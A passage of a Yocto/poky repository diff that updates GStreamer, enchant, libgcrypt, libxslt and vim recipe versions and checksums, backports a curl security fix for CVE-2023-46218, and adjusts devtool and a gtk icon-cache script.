"https://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad file://0002-avoid-including-sys-poll.h-directly.patch \ file://0004-opencv-resolve-missing-opencv-data-dir-in-yocto-buil.patch \ " -SRC_URI[sha256sum] = "b4029cd2908a089c55f1d902a565d007495c95b1442d838485dc47fb12df7137" +SRC_URI[sha256sum] = "c716f8dffa8fac3fb646941af1c6ec72fff05a045131311bf2d049fdc87bce2e" S = "${WORKDIR}/gst-plugins-bad-${PV}" diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.22.7.bb index 1f67ca303a..3b8923e8f2 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.22.6.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.22.7.bb @@ -11,7 +11,7 @@ SRC_URI = "https://gstreamer.freedesktop.org/src/gst-plugins-base/gst-plugins-ba file://0003-viv-fb-Make-sure-config.h-is-included.patch \ file://0002-ssaparse-enhance-SSA-text-lines-parsing.patch \ " -SRC_URI[sha256sum] = "50f2b4d17c02eefe430bbefa8c5cd134b1be78a53c0f60e951136d96cf49fd4b" +SRC_URI[sha256sum] = "62519e0d8f969ebf62a9a7996f2d23efdda330217a635f4a32c0bf1c71577468" S = "${WORKDIR}/gst-plugins-base-${PV}" diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.22.7.bb index 6b76ba957e..b8496a1750 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.22.6.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.22.7.bb @@ -8,7 +8,7 @@ SRC_URI = "https://gstreamer.freedesktop.org/src/gst-plugins-good/gst-plugins-go file://0001-qt-include-ext-qt-gstqtgl.h-instead-of-gst-gl-gstglf.patch \ file://0001-v4l2-Define-ioctl_req_t-for-posix-linux-case.patch" -SRC_URI[sha256sum] = "b3b07fe3f1ce7fe93aa9be7217866044548f35c4a7792280eec7e108a32f9817" +SRC_URI[sha256sum] = "b6db0e18e398b52665b7cdce301c34a8750483d5f4fbac1ede9f80b03743cd15" S = "${WORKDIR}/gst-plugins-good-${PV}" diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.22.7.bb index 77f79a630a..8a67531123 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.22.6.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.22.7.bb @@ -14,7 +14,7 @@ LICENSE_FLAGS = "commercial" SRC_URI = " \ https://gstreamer.freedesktop.org/src/gst-plugins-ugly/gst-plugins-ugly-${PV}.tar.xz \ " -SRC_URI[sha256sum] = "3e31454c98cb2f7f6d2d355eceb933a892fa0f1dc09bc36c9abc930d8e29ca48" +SRC_URI[sha256sum] = "520b46bca637189ad86a298ff245b2d89375dbcac8b05d74daea910f81a9e9da" S = "${WORKDIR}/gst-plugins-ugly-${PV}" diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.22.7.bb index addf12c427..a387031635 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.22.6.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.22.7.bb @@ -8,7 +8,7 @@ LICENSE = "LGPL-2.1-or-later" LIC_FILES_CHKSUM = "file://COPYING;md5=c34deae4e395ca07e725ab0076a5f740" SRC_URI = "https://gstreamer.freedesktop.org/src/${PNREAL}/${PNREAL}-${PV}.tar.xz" -SRC_URI[sha256sum] = "51de2d6d13b12ce095eac97c0b94ee59c2aeba3712bb7462b78c4d57dde176c5" +SRC_URI[sha256sum] = "1ef8df7608012fa469329799c950ec087737a6dabad3003c230658b58c710172" DEPENDS = "gstreamer1.0 gstreamer1.0-plugins-base python3-pygobject" RDEPENDS:${PN} += "gstreamer1.0 gstreamer1.0-plugins-base python3-pygobject" diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.22.7.bb index fd79fe4324..af1c2ced44 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.22.6.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.22.7.bb @@ -10,7 +10,7 @@ PNREAL = "gst-rtsp-server" SRC_URI = "https://gstreamer.freedesktop.org/src/${PNREAL}/${PNREAL}-${PV}.tar.xz" -SRC_URI[sha256sum] = "0ae33a8b50443b62f11581a9181e906b41cd3877b2d799dbea72912c3eda4bb3" +SRC_URI[sha256sum] = "f7fac001e20ad21e36d18397741c4657c5d43571eb1cc3b49f9a93ae127dc88f" S = "${WORKDIR}/${PNREAL}-${PV}" diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.22.7.bb index bf4c105057..4cad50742d 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.22.6.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.22.7.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=4fbd65380cdd255951079008b364516c" SRC_URI = "https://gstreamer.freedesktop.org/src/${REALPN}/${REALPN}-${PV}.tar.xz" -SRC_URI[sha256sum] = "d9ba2fc26bef98c78e982c599f585d46bbb65fe122da89c2d7ab41f468a52c7b" +SRC_URI[sha256sum] = "0e9fff768b89de6d318b34146e4e781d82b9a0f4025dc541b2c8349c7bcb7f67" S = "${WORKDIR}/${REALPN}-${PV}" DEPENDS = "libva gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad" diff --git a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.22.6.bb b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.22.7.bb index a898464322..72161b272f 100644 --- a/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.22.6.bb +++ b/poky/meta/recipes-multimedia/gstreamer/gstreamer1.0_1.22.7.bb @@ -22,7 +22,7 @@ SRC_URI = "https://gstreamer.freedesktop.org/src/gstreamer/gstreamer-${PV}.tar.x file://0003-tests-use-a-dictionaries-for-environment.patch;striplevel=3 \ file://0004-tests-add-helper-script-to-run-the-installed_tests.patch;striplevel=3 \ " -SRC_URI[sha256sum] = "f500e6cfddff55908f937711fc26a0840de28a1e9ec49621c0b6f1adbd8f818e" +SRC_URI[sha256sum] = "01e42c6352a06bdfa4456e64b06ab7d98c5c487a25557c761554631cbda64217" PACKAGECONFIG ??= "${@bb.utils.contains('PTEST_ENABLED', '1', 'tests', '', d)} \ check \ diff --git a/poky/meta/recipes-support/curl/curl/CVE-2023-46218.patch b/poky/meta/recipes-support/curl/curl/CVE-2023-46218.patch new file mode 100644 index 0000000000..de2f095664 --- /dev/null +++ b/poky/meta/recipes-support/curl/curl/CVE-2023-46218.patch @@ -0,0 +1,52 @@ +CVE: CVE-2023-46218 +Upstream-Status: Backport [ https://github.com/curl/curl/commit/2b0994c29a721c91c57 ] +Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com> + +From 2b0994c29a721c91c572cff7808c572a24d251eb Mon Sep 17 00:00:00 2001 +From: Daniel Stenberg <daniel@haxx.se> +Date: Thu, 23 Nov 2023 08:15:47 +0100 +Subject: [PATCH] cookie: lowercase the domain names before PSL checks + +Reported-by: Harry Sintonen + +Closes #12387 +--- + lib/cookie.c | 24 ++++++++++++++++-------- + 1 file changed, 16 insertions(+), 8 deletions(-) + +diff --git a/lib/cookie.c b/lib/cookie.c +index 568cf537ad1b1f..9095cea3e97f22 100644 +--- a/lib/cookie.c ++++ b/lib/cookie.c +@@ -1027,15 +1027,23 @@ Curl_cookie_add(struct Curl_easy *data, + * dereference it. + */ + if(data && (domain && co->domain && !Curl_host_is_ipnum(co->domain))) { +- const psl_ctx_t *psl = Curl_psl_use(data); +- int acceptable; +- +- if(psl) { +- acceptable = psl_is_cookie_domain_acceptable(psl, domain, co->domain); +- Curl_psl_release(data); ++ bool acceptable = FALSE; ++ char lcase[256]; ++ char lcookie[256]; ++ size_t dlen = strlen(domain); ++ size_t clen = strlen(co->domain); ++ if((dlen < sizeof(lcase)) && (clen < sizeof(lcookie))) { ++ const psl_ctx_t *psl = Curl_psl_use(data); ++ if(psl) { ++ /* the PSL check requires lowercase domain name and pattern */ ++ Curl_strntolower(lcase, domain, dlen + 1); ++ Curl_strntolower(lcookie, co->domain, clen + 1); ++ acceptable = psl_is_cookie_domain_acceptable(psl, lcase, lcookie); ++ Curl_psl_release(data); ++ } ++ else ++ acceptable = !bad_domain(domain, strlen(domain)); + } +- else +- acceptable = !bad_domain(domain, strlen(domain)); + + if(!acceptable) { + infof(data, "cookie '%s' dropped, domain '%s' must not " diff --git a/poky/meta/recipes-support/curl/curl_8.4.0.bb b/poky/meta/recipes-support/curl/curl_8.4.0.bb index 5f97730bf4..8f1ba52692 100644 --- a/poky/meta/recipes-support/curl/curl_8.4.0.bb +++ b/poky/meta/recipes-support/curl/curl_8.4.0.bb @@ -13,6 +13,7 @@ SRC_URI = " \ https://curl.se/download/${BP}.tar.xz \ file://run-ptest \ file://disable-tests \ + file://CVE-2023-46218.patch \ " SRC_URI[sha256sum] = "16c62a9c4af0f703d28bda6d7bbf37ba47055ad3414d70dec63e2e6336f2a82d" diff --git a/poky/meta/recipes-support/enchant/enchant2_2.6.1.bb b/poky/meta/recipes-support/enchant/enchant2_2.6.2.bb index a3510a8705..38d3245d20 100644 --- a/poky/meta/recipes-support/enchant/enchant2_2.6.1.bb +++ b/poky/meta/recipes-support/enchant/enchant2_2.6.2.bb @@ -12,7 +12,7 @@ DEPENDS = "glib-2.0 groff-native" inherit autotools pkgconfig github-releases SRC_URI = "${GITHUB_BASE_URI}/download/v${PV}/enchant-${PV}.tar.gz" -SRC_URI[sha256sum] = "f24e12469137ae1d03140bb9032a47a5947c36f4d1e2f12b929061005eb15279" +SRC_URI[sha256sum] = "6686a728e56e760f8dee09a22f0fb53b46ee9dbe7d64cf9e5bb35a658bff7e1d" GITHUB_BASE_URI = "https://github.com/AbiWord/enchant/releases" diff --git a/poky/meta/recipes-support/libgcrypt/libgcrypt_1.10.2.bb b/poky/meta/recipes-support/libgcrypt/libgcrypt_1.10.3.bb index 524b06ca22..1c4f4d6038 100644 --- a/poky/meta/recipes-support/libgcrypt/libgcrypt_1.10.2.bb +++ b/poky/meta/recipes-support/libgcrypt/libgcrypt_1.10.3.bb @@ -27,7 +27,7 @@ SRC_URI = "${GNUPG_MIRROR}/libgcrypt/libgcrypt-${PV}.tar.bz2 \ file://no-bench-slope.patch \ file://run-ptest \ " -SRC_URI[sha256sum] = "3b9c02a004b68c256add99701de00b383accccf37177e0d6c58289664cce0c03" +SRC_URI[sha256sum] = "8b0870897ac5ac67ded568dcfadf45969cfa8a6beb0fd60af2a9eadc2a3272aa" CVE_STATUS[CVE-2018-12433] = "disputed: CVE is disputed and not affecting crypto libraries for any distro." CVE_STATUS[CVE-2018-12438] = "disputed: CVE is disputed and not affecting crypto libraries for any distro." diff --git a/poky/meta/recipes-support/libxslt/libxslt_1.1.38.bb b/poky/meta/recipes-support/libxslt/libxslt_1.1.39.bb index ed5b15badd..2cc0c84bec 100644 --- a/poky/meta/recipes-support/libxslt/libxslt_1.1.38.bb +++ b/poky/meta/recipes-support/libxslt/libxslt_1.1.39.bb @@ -15,7 +15,7 @@ DEPENDS = "libxml2" SRC_URI = "https://download.gnome.org/sources/libxslt/1.1/libxslt-${PV}.tar.xz" -SRC_URI[sha256sum] = "1f32450425819a09acaff2ab7a5a7f8a2ec7956e505d7beeb45e843d0e1ecab1" +SRC_URI[sha256sum] = "2a20ad621148339b0759c4d4e96719362dee64c9a096dbba625ba053846349f0" UPSTREAM_CHECK_REGEX = "libxslt-(?P<pver>\d+(\.\d+)+)\.tar" diff --git a/poky/meta/recipes-support/vim/vim.inc b/poky/meta/recipes-support/vim/vim.inc index a37310afd8..6b440d8947 100644 --- a/poky/meta/recipes-support/vim/vim.inc +++ b/poky/meta/recipes-support/vim/vim.inc @@ -19,8 +19,8 @@ SRC_URI = "git://github.com/vim/vim.git;branch=master;protocol=https \ file://no-path-adjust.patch \ " -PV .= ".2068" -SRCREV = "9198c1f2b1ddecde22af918541e0de2a32f0f45a" +PV .= ".2130" +SRCREV = "075ad7047457debfeef13442c01e74088b461092" # Do not consider .z in x.y.z, as that is updated with every commit UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0" diff --git a/poky/scripts/lib/devtool/standard.py b/poky/scripts/lib/devtool/standard.py index d53fb81007..55fa38ccfb 100644 --- a/poky/scripts/lib/devtool/standard.py +++ b/poky/scripts/lib/devtool/standard.py @@ -1530,6 +1530,11 @@ def _update_recipe_srcrev(recipename, workspace, srctree, rd, appendlayerdir, wi recipedir = os.path.basename(recipefile) logger.info('Updating SRCREV in recipe %s%s' % (recipedir, dry_run_suffix)) + # Get original SRCREV + old_srcrev = rd.getVar('SRCREV') or '' + if old_srcrev == "INVALID": + raise DevtoolError('Update mode srcrev is only valid for recipe fetched from an SCM repository') + # Get HEAD revision try: stdout, _ = bb.process.run('git rev-parse HEAD', cwd=srctree) @@ -1556,7 +1561,6 @@ def _update_recipe_srcrev(recipename, workspace, srctree, rd, appendlayerdir, wi if not no_remove: # Find list of existing patches in recipe file patches_dir = tempfile.mkdtemp(dir=tempdir) - old_srcrev = rd.getVar('SRCREV') or '' upd_p, new_p, del_p = _export_patches(srctree, rd, old_srcrev, patches_dir) logger.debug('Patches: update %s, new %s, delete %s' % (dict(upd_p), dict(new_p), dict(del_p))) @@ -1576,11 +1580,10 @@ def _update_recipe_srcrev(recipename, workspace, srctree, rd, appendlayerdir, wi patchfields['SRC_URI'] = '\\\n '.join(srcuri) if dry_run_outdir: logger.info('Creating bbappend (dry-run)') - else: - appendfile, destpath = oe.recipeutils.bbappend_recipe( - rd, appendlayerdir, files, wildcardver=wildcard_version, - extralines=patchfields, removevalues=removevalues, - redirect_output=dry_run_outdir) + appendfile, destpath = oe.recipeutils.bbappend_recipe( + rd, appendlayerdir, files, wildcardver=wildcard_version, + extralines=patchfields, removevalues=removevalues, + redirect_output=dry_run_outdir) else: files_dir = _determine_files_dir(rd) for basepath, path in upd_f.items(): diff --git a/poky/scripts/postinst-intercepts/update_gtk_icon_cache b/poky/scripts/postinst-intercepts/update_gtk_icon_cache index 99367a2855..a92bd840c6 100644 --- a/poky/scripts/postinst-intercepts/update_gtk_icon_cache +++ b/poky/scripts/postinst-intercepts/update_gtk_icon_cache @@ -11,7 +11,11 @@ $STAGING_DIR_NATIVE/${libdir_native}/gdk-pixbuf-2.0/gdk-pixbuf-query-loaders --u for icondir in $D/usr/share/icons/*/ ; do if [ -d $icondir ] ; then - gtk-update-icon-cache -fqt $icondir + for gtkuic_cmd in gtk-update-icon-cache gtk4-update-icon-cache ; do + if [ -n "$(which $gtkuic_cmd)" ]; then + $gtkuic_cmd -fqt $icondir + fi + done fi done |
